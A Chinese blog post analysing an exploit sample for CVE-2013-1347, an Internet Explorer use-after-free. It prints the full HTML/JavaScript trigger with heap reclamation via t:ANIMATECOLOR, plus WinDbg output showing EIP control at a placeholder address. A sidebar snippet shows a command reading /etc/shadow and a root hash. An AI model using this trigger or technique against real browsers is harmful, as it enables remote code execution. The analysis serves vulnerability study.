CVE-2013-1347:Microsoft IE CGenericElement UAF 漏洞利用样本分析

已于 2023-08-15 09:37:25 修改
阅读量161 收藏
点赞数
分类专栏: 漏洞分析 文章标签: 漏洞利用 CVE-2013-1347
于 2019-05-05 21:02:53 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_38924942/article/details/89855214
版权
  • CVE-2013-1347 漏洞是典型的 IE 浏览器 UAF 漏洞,所以其利用方法和一般的 IE 浏览器漏洞的利用方法非常相似,所以流程大体上可以分为这些步骤:(1) 对象被释放 (2) 精确覆盖被释放对象的内存空间,更改 EIP 寄存器从而控制程序的流程 (3) 触发漏洞实现重引用
  • 以下就是利用此漏洞的样本

<!doctype html>
<HTML XMLNS:t ="urn:schemas-microsoft-com:time">
<head>
<meta>
	<?IMPORT namespace="t" implementation="#default#time2">
</meta>

<script>
function helloWorld()
{
	animvalues = ""; 

	for (i=0; i <= 0x70/4; i++) {

		if (i == 0x70/4) { 
			animvalues += unescape("%u4141%u4141");   // ¿ØÖÆedx=0x41414141
		}
		else {
			animvalues += unescape("%u4242%u4242");	  // 0x42424242
		}	
	}

	for(i = 0; i < 13; i++) {
		animvalues += ";red";		
	}

	// 执行漏洞触发代码开始
	f0 = document.createElement('span');
	document.body.appendChild(f0);
	f1 = document.createElement('span');
	document.body.appendChild(f1);
	f2 = document.createElement('span');
	document.body.appendChild(f2);
	document.body.contentEditable="true";
	f2.appendChild(document.createElement('datalist'));
	f1.appendChild(document.createElement('span'));
	f1.appendChild(document.createElement('table'));
	try{
		f0.offsetParent=null;
	}catch(e) {}
	
	f2.innerHTML="";
	f0.appendChild(document.createElement('hr'));
	f1.innerHTML="";

	CollectGarbage();
	// 执行漏洞代码结束 
	
	try {

		a = document.getElementById('myanim');
		a.values = animvalues;
	}
	catch(e) {}
}

</script>
</head>
<body onload="eval(helloWorld());">
<t:ANIMATECOLOR id="myanim"/>
</body>
</html>
  • 想要了解该代码是如何利用的,首先需要知道程序是怎么进行重引用的,所以使用 Windbg 加载 IE 运行后拖入样本文件。对了在这之前需要开启 hpa,方便在内存异常处断下,并且使用 .childdbg 1 开启多线程调试
    在这里插入图片描述
  • 触发异常后断下,从异常触发点可以看出 mov eax, dword ptr [ecx] 这条指令的地址是 74ddc400
    在这里插入图片描述
  • 结合 IDA 分析,可以看出首先将对象的首地址存放在 eax 中,之后根据虚表偏移 0x70 个字节,根据偏移后的虚表地址调用函数 call edx,这也是 C++ 调用虚函数的通用方法
  • 所以怎么才可以覆盖虚表指针后,再覆盖虚表偏移 0x70 大小的数据呢,答案是使用 t:ANIMATECOLOR 元素,这个元素对象很特别,该元素有一个 values 属性,当给 values 属性赋字符串的时候,会以 ;号做为分隔符,每个分割出来的字符串都会用一个指针去指向它
    在这里插入图片描述
  • 所以知道了这些,样本中的利用代码就很好分析了,首先通过循环构造 0x70 大小的数据,用于覆盖虚表的 0x70 个字节
    在这里插入图片描述
  • 之后再次循环构造以 ;号分隔的字符串,使对象大小变为 0x4c,方便占坑,同时覆盖虚表指针

注:占坑表示完整覆盖释放后的堆空间
在这里插入图片描述

  • 最后将 t:ANIMATECOLOR 元素的 values 属性赋值为 animvalues 字符串
    在这里插入图片描述
  • 构造完的 t:ANIMATECOLOR 元素对象的内存结构就如下图所示:
    在这里插入图片描述
  • 下面来调试一遍,关闭 hpa 之后,加载 IE 拖入样本后调试结果如下:
.
.
.
(74c4c234)   mshtml!CGenericElement::CreateElement   |  (74c4c279)   mshtml!CGenericElement::CGenericElement
Exact matches:
    mshtml!CGenericElement::CreateElement = <no type information>
'=== CElement ==='
080ac250  74c254b0 00000001 00000008 00000000
080ac260  00000000 00000000 00000000 00000000
080ac270  00000000 00000000
'=== CTreeNode ==='
080a38d0  080ac250
080ac250  74c4c2e8 mshtml!CGenericElement::`vftable'
.
.
.
eax=02f23048 ebx=080a38d0 ecx=080ac250 edx=41414141 esi=054ff078 edi=00000000
eip=41414141 esp=054ff048 ebp=054ff064 iopl=0         nv up ei pl zr na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010246
41414141 ??              ???
  • 查看漏洞对象 CGenericElement 已经释放的内存空间 0x080ac250 的覆盖情况,发现已经被覆盖了
2:040> dd 080ac250
080ac250  02f23048 02f5cf60 02f5cf80 02f5cfa0
080ac260  02f5cfc0 02f5cfe0 02f5d000 02f5d020
080ac270  02f5d040 02f5d060 02f5d080 02f5d0a0
080ac280  02f5d0c0 02f5d0e0 236b22bf c2000000
080ac290  0670c7a4 00000000 00000002 0502001e
080ac2a0  0000000e 9ea75230 00000012 006e006f
080ac2b0  00720074 006e0061 00690073 00690074
080ac2c0  006e006f 00650072 00650070 00740061
  • 查看一下第一个字符串指针指向的值,就是之前循环赋值的值,0x70 偏移地址的值为 0x41414141,所以 edx 寄存器中的值会变为 0x41414141
2:040> dd 02f23048 
02f23048  42424242 42424242 42424242 42424242
02f23058  42424242 42424242 42424242 42424242
02f23068  42424242 42424242 42424242 42424242
02f23078  42424242 42424242 42424242 42424242
02f23088  42424242 42424242 42424242 42424242
02f23098  42424242 42424242 42424242 42424242
02f230a8  42424242 42424242 42424242 42424242
02f230b8  41414141 00000000 28d3aa3e c2000000
  • 最后 call edx,也就是 jmp 0x41414141,之后配合绕过防御的代码,就可以达到执行任意代码的目的
    在这里插入图片描述
WJ Clinton
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
CVE-2013-3893 IE浏览器UAF漏洞分析
wuliang的博客
04-11 818
CVE-2013-3893 IE浏览器UAF漏洞利用 漏洞成因 CVE-2013-3893发生原因是浏览器中函数SetMouseCapture()在事件响应中处理了一个已经被释放的引用而导致了Use-After-Free型漏洞的发生。该漏洞对IE6-11版本全覆盖。本次利用是windows xp sp3环境下的IE8版本中进行。 详情描述 首先创建两个元素。 利用document.body....
CVE-2013-1347Microsoft IE CGenericElement UAF 漏洞
CuiXY's Blog
05-05 349
0x01 前言
APUE 第六章
newbaby2012的专栏
09-19 163
口令文件 其实我觉得叫密码文件也可以, strptime,strftime完成字符串和struct tm { day, month, year等等}的转换 阴影口令 查看文件: sudo cat /etc/shadow root:$6$drbtofiPuQIhvTu3$Z6OjGV0Pbdn2AUUsxeyfCKRVpDYCQaSNGpKZQ3Qbv6DASW36J.2IWazgsrJVtk0R5efvnoSPbMhNZHk8WpIos1:18866:0:99999:7::: dae
CVE-2013-1347Microsoft Internet Explorer 8 远程执行代码漏洞
weixin_30267785的博客
07-29 196
[CNNVD]Microsoft Internet Explorer 8 远程执行代码漏洞(CNNVD-201305-092) Microsoft Internet Explorer是美国微软(Microsoft)公司发布的Windows操作系统中默认捆绑的Web浏览器。 Internet Explorer 访问尚未正确初始化或已被删除的对象的方式中存在一个远...
CVE-2013-1347:从入门到放弃之调试分析令人崩溃的 Microsoft IE CGenericElement UAF 漏洞...
墨鱼菜鸡
05-05 184
0x01 2013 年 “水坑” APT 攻击事件 在 2013 年 5 月,美国的劳工部网站被黑,利用的正是 CVE-2013-...
CVE-2013-6117:CVE-2013-6117
04-29
CVE-2013-6117 $ ./CVE-2013-6117 -hOptions: -h, --help display help information -f, --filename File containing list of IP addresses -t, --target Target IP -n, --threads No of concurrent threads ...
buherablog-cve-2013-1488:基于http的PoC Java漏洞利用
06-12
【Java Pwn2Own 漏洞利用 - CVE-2013-1488】 CVE-2013-1488 是一个针对Java的严重安全漏洞,它出现在2013年,影响了Java SE 7u21 之前的版本。此漏洞允许远程攻击者通过构建特制的Java Applet或Web应用来执行任意...
CVE-2021-21972:CVE-2021-21972漏洞利用
03-04
CVE-2021-21972 CVE-2021-21972工作于VMware-VCSA-all-6.7.0-8217866,VMware-VIM-all-6.7.0-8217866 :heavy_check_mark: VMware-VCSA-all-6.5.0-16613358 :heavy_check_mark:对于vCenter6.7 U2 + vCenter 6.7U2 +在...
CVE-2021-22192:CVE-2021-22192靶场:未授权用户RCE漏洞
03-30
CVE-2021-22192 CVE-2021-22192靶场:未授权用户RCE漏洞0x10靶场环境0x20目录结构CVE-2021-22192├── README.md ............... [此 README 说明]├── imgs .................... [辅助 README 说明的图片]├─...
CVE-2021-21975:Nmap脚本检查漏洞CVE-2021-21975
04-06
CVE-2021-21975 Nmap脚本检查漏洞CVE-2021-21975 漏洞参考: 博客 例子 nmap -p443 --script cve-2021-21975.nse --script-args vulns.showall IP
CVE-2013-4694 WinAmp 5.63 栈溢出漏洞分析
此去清风白日,自由道风景好
07-19 1070
WinAmp 5.63 - Stack-based BufferOverflow 前天在exploit-db找到这个漏洞的描述。闲着没事,就调试了一下。这个漏洞的触发条件是在winamp.ini中skin这个字符串在使用lstrcpyn进行拷贝的时候,未检测skin的长短,导致我们可修改skin的值进行溢出。 比较有意思的是传入的字符串在用lstrcpyn比较的时候是unicode的格式的,而
漏洞复现之CVE-2013-4547
Blood_Pupil的博客
03-15 5230
CVE-2013-4547是Nginx中间件的一个文件名解析漏洞 漏洞原理 【注:下文中[]表示字节】 以vulnhub提供的漏洞环境为例,我们首先看一下前端页面 再看一下后端的过滤 目前的情况看来我们不能传后缀名为php这一类的文件,那么我们就把文件后缀名改为jpg吧,然后上传 我们尝试访问下 看来上传成功了,我们得想办法执行,nginx不是把所有后缀名为php的文件交给fastcgi...
CVE-2012-1889漏洞利用
enjoy5512的博客
09-25 3735
ROP技术绕过DEP保护 Heap Spray技术绕过ASLR保护 CVE-2012-1889
漏洞总结-linux提权漏洞
smart的博客
09-02 6569
漏洞总结-linux提权漏洞CVE-2019-13272CVE-2016-5195 CVE-2019-13272 此漏洞只能在使用了pkexec验证程序的系统中可以提权成功。 受影响的系统 Ubuntu 16.04.5 kernel 4.15.0-29-generic Ubuntu 18.04.1 kernel 4.15.0-20-generic Ubuntu 19.04 kernel 5.0.0-15-generic Ubuntu Mate 18.04.2 kernel 4.1
利用CVE-2017-11882漏洞利用的恶意样本分析
zz_strive_2012的专栏
11-30 2348
概述 2017年11月14日,微软修复了一个Office远程代码执行严重漏洞,漏洞编号为CVE-2017-11882。该漏洞类型为典型的栈溢出漏洞,漏洞代码存在于EQNEDT32.EXE组件中。据称,该组件于2001年编译嵌入Office之后就没有任何修改,迄今已存在17年,这也决定了漏洞会影响当前流行的所有Office版本,漏洞影响之广泛可见一斑。 腾讯安全联合实验室反病毒实验室
聊聊GenericObjectPool的泄露检测
weixin_34388207的博客
10-19 405
序 本文主要聊聊GenericObjectPool的abandon参数。主要用来做连接池的泄露检测用。 object的状态 commons-pool2-2.4.2-sources.jar!/org/apache/commons/pool2/PooledObjectState.java public enum PooledObjectState { /** * In the que...
使用 React 和 Redux 进行井字游戏并附带源代码.zip
最新发布
07-24
项目:使用 React 和 Redux 进行井字游戏并附带源代码 使用 react 和 redux 的井字游戏是一个简单的 react 项目。整个项目都是使用 react components 和redux制作的。游戏很简单,玩法也很多。要运行此项目,您必须先安装 NodeJS。 关于项目 井字游戏反应而 redux 是使用ReactJS开发的。说到这个游戏,它具有高级功能和游戏玩法。要运行此项目,首先,您必须安装费用到您的系统。然后运行npm安装然后开始运行npm开始。游戏启动后,您可以选择不同的游戏选项。您还可以选择所需的网格框数量。此外,您还可以选择对手的类型。 要运行此项目,您需要 在计算机上安装NodeJS 并使用现代浏览器,例如 Google Chrome、  Mozilla Firefox。 演示: 该项目为国外大神项目,可以作为毕业设计的项目,也可以作为大作业项目,不用担心代码重复,设计重复等,如果需要对项目进行修改,需要具备一定基础知识。 注意:如果装有360等杀毒软件,可能会出现误报的情况,源码本身并无病毒,使用源码时可以关闭360,或者添加信任。
使用 JavaScript 编写的专注力游戏(附源代码).zip
07-24
项目:JavaScript 中的专注力游戏(附源代码) 专注力游戏是一个使用 JavaScript、CSS 和 HTML 开发的简单项目。这款游戏很有趣。玩家必须点击移动的框并获得分数。要点击正确的位置,玩家需要在这个游戏中集中注意力。这款游戏可以帮助玩家练习以进一步增强他们的专注力。 游戏制作 这个游戏项目仅使用 HTML、CSS 和 JavaScript。说到这个游戏的特点,用户必须单击移动框并得分。游戏有三种模式:简单、中等和困难。游戏的 PC 控制非常简单。您只需使用光标单击移动框的碎片即可。 该游戏包含大量的 javascript 以确保游戏正常运行。 如何运行该项目? 要运行此游戏,您不需要任何类型的本地服务器,但需要浏览器。我们建议您使用现代浏览器,如 Google Chrome 和 Mozilla Firefox。要玩游戏,首先,单击 index.html 文件在浏览器中打开游戏。 演示: 该项目为国外大神项目,可以作为毕业设计的项目,也可以作为大作业项目,不用担心代码重复,设计重复等,如果需要对项目进行修改,需要具备一定基础知识。 注意:如果装有360等杀毒软件,可能会出现误报的情况,源码本身并无病毒,使用源码时可以关闭360,或者添加信任。
CVE-2019-0708:Windows远程桌面UAF漏洞分析与复现
CVE-2019-0708是一个远程代码执行漏洞,微软在2019年5月发布了紧急补丁来修复这个问题。该漏洞可能影响到包括Windows 7、Windows Server 2008 R2、Windows Server 2008、Windows Server 2003和Windows XP在内的旧版...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值